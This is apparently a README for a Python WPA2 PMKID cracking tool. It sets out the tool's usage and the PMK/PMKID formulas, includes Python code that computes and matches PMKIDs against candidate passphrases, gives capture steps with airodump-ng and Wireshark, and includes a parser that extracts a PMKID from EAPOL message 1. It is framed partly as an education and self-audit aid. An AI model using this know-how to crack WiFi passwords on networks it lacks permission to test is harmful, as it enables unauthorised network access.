This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication and without requiring any clients to be on the network. It targets the weakness of certain access points that advertise the PMKID value in EAPOL message 1.
Program Usage
python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>
NOTE: apmac, clientmac and pmkid must be hex strings, e.g. b8621f50edd9
How PMKID is Calculated
The two main formulas needed to obtain a PMKID are as follows:
- Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) with 4096 iterations
- PMKID Calculation: HMAC-SHA1(key = pmk, data = "PMK Name" + bssid + clientmac)
This is only for understanding; both are already implemented in find_pw_chunk and calculate_pmkid.
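The two formulas above, carried through in Python as an added example (this is not the project's own find_pw_chunk or calculate_pmkid code). It assumes the standard WPA2 definitions: the PMK is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 32 bytes of output, and the PMKID is the first 128 bits of HMAC-SHA1 keyed with the PMK over "PMK Name" || AP MAC || client MAC. The PMK test vector ("password" / "IEEE") is the one published in the IEEE 802.11i test-vector annex; the client MAC and the pmkid_matches helper are constructed for illustration. A network owner can use the same check to confirm that a PMKID captured from their own AP no longer matches a retired passphrase.

```python
import hashlib
import hmac


def normalize_mac(mac: str) -> str:
    """Accept 'b8:62:1f:50:ed:d9', 'b8-62-1f-50-ed-d9' or 'b8621f50edd9' and
    return the 12-character lowercase hex string the tool's arguments expect."""
    cleaned = mac.replace(":", "").replace("-", "").lower()
    if len(cleaned) != 12 or any(c not in "0123456789abcdef" for c in cleaned):
        raise ValueError(f"not a MAC address: {mac!r}")
    return cleaned


def calculate_pmk(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 256-bit output)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def calculate_pmkid(pmk: bytes, ap_mac: str, client_mac: str) -> bytes:
    # PMKID = HMAC-SHA1(key=PMK, "PMK Name" || AA || SPA) truncated to 128 bits
    data = b"PMK Name" + bytes.fromhex(normalize_mac(ap_mac)) + bytes.fromhex(normalize_mac(client_mac))
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def pmkid_matches(passphrase: str, ssid: str, ap_mac: str, client_mac: str, pmkid_hex: str) -> bool:
    """True if the passphrase reproduces the captured PMKID (constructed helper)."""
    candidate = calculate_pmkid(calculate_pmk(passphrase, ssid), ap_mac, client_mac)
    return hmac.compare_digest(candidate, bytes.fromhex(pmkid_hex))


# Constructed sample values: the AP MAC is the one from the README note,
# the client MAC is made up for this example.
SAMPLE_AP_MAC = "b8621f50edd9"
SAMPLE_CLIENT_MAC = "00:11:22:33:44:55"


def demo() -> dict:
    """Compute the PMK for the 802.11i test vector and a PMKID for the sample MACs."""
    pmk = calculate_pmk("password", "IEEE")
    pmkid = calculate_pmkid(pmk, SAMPLE_AP_MAC, SAMPLE_CLIENT_MAC)
    return {
        "pmk": pmk.hex(),
        "pmkid": pmkid.hex(),
        "correct_passphrase_matches": pmkid_matches("password", "IEEE", SAMPLE_AP_MAC, SAMPLE_CLIENT_MAC, pmkid.hex()),
        "wrong_passphrase_matches": pmkid_matches("Password", "IEEE", SAMPLE_AP_MAC, SAMPLE_CLIENT_MAC, pmkid.hex()),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Note that the whole cost of a candidate check is the PBKDF2 step; the HMAC that produces the PMKID is cheap, which is why the PMK derivation dominates any wordlist run and why passphrase length, not the PMKID itself, is what protects the network.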
Obtaining the PMKID
Below are the steps to obtain the PMKID manually by inspecting the packets in Wireshark.
*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the steps below. The manual way is for understanding.
To obtain the PMKID manually from Wireshark, put your wireless adapter in monitor mode and start capturing all packets with airodump-ng or a similar tool. Then connect to the AP using an invalid password to capture EAPOL message 1 of the handshake. Follow the next 3 steps to obtain the fields needed for the arguments.
Open the pcap in Wireshark:
- Filter with wlan_rsna_eapol.keydes.msgnr == 1 in Wireshark to show only EAPOL message 1 packets.
- In the EAPOL 1 packet, expand IEEE 802.11 QoS Data Field to obtain the AP MAC and Client MAC
- In the EAPOL 1 packet, expand 802.1X Authentication > WPA Key Data > Tag: Vendor Specific > the PMKID is below
If the access point is vulnerable, you should see the PMKID value like the screenshot below:
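What Wireshark shows under WPA Key Data > Tag: Vendor Specific is an RSN PMKID KDE, and the check "does my AP put a PMKID in message 1" can be automated instead of done by eye. The parser below is an added example, not part of this project: it walks the Key Data field of an EAPOL-Key frame, element by element, and returns the PMKID if an RSN KDE (tag 0xdd, OUI 00:0f:ac, data type 4) is present. The Key Data bytes are constructed inline for this example (a dummy leading element plus a PMKID KDE carrying a made-up PMKID); in practice you would take them from the EAPOL-Key "Key Data" field of a captured message 1. Running this over captures from your own APs tells you which of them expose a PMKID and therefore warrant a firmware update or a configuration change.

```python
RSN_OUI = bytes.fromhex("000fac")
PMKID_KDE_TYPE = 4          # data type 4 in the RSN KDE table means PMKID
VENDOR_SPECIFIC_TAG = 0xDD


def parse_pmkid_kde(key_data: bytes):
    """Return the 16-byte PMKID carried in an RSN PMKID KDE, or None if absent.

    Key Data is a sequence of (tag, length, body) elements; KDEs use tag 0xdd
    with body = OUI(3) || data type(1) || data. Trailing 0xdd padding elements
    with length 0 are skipped like any other element.
    """
    i = 0
    while i + 2 <= len(key_data):
        tag, length = key_data[i], key_data[i + 1]
        body = key_data[i + 2 : i + 2 + length]
        if len(body) < length:
            return None             # truncated element; do not read past the buffer
        if (tag == VENDOR_SPECIFIC_TAG and len(body) >= 4
                and body[:3] == RSN_OUI and body[3] == PMKID_KDE_TYPE):
            return body[4:20] if len(body) >= 20 else None
        i += 2 + length
    return None


def build_pmkid_kde(pmkid: bytes) -> bytes:
    """Construct an RSN PMKID KDE (used here only to build the sample input)."""
    if len(pmkid) != 16:
        raise ValueError("PMKID must be 16 bytes")
    return bytes([VENDOR_SPECIFIC_TAG, 20]) + RSN_OUI + bytes([PMKID_KDE_TYPE]) + pmkid


# Constructed sample Key Data: a dummy element (tag 0x30, two bytes) followed by a
# PMKID KDE with a made-up PMKID. Neither value comes from a real capture.
SAMPLE_PMKID = bytes.fromhex("0123456789abcdef0123456789abcdef")
SAMPLE_KEY_DATA = b"\x30\x02\x01\x00" + build_pmkid_kde(SAMPLE_PMKID) + b"\xdd\x00"


def ap_exposes_pmkid(key_data: bytes) -> bool:
    """Defender's check: True if message 1 advertises a PMKID at all."""
    return parse_pmkid_kde(key_data) is not None


if __name__ == "__main__":
    found = parse_pmkid_kde(SAMPLE_KEY_DATA)
    print("PMKID:", found.hex() if found else "not present")
```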
Demo Run
Disclaimer
This tool is for educational and testing purposes only. Don't use it to exploit the vulnerability on any network that you don't own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.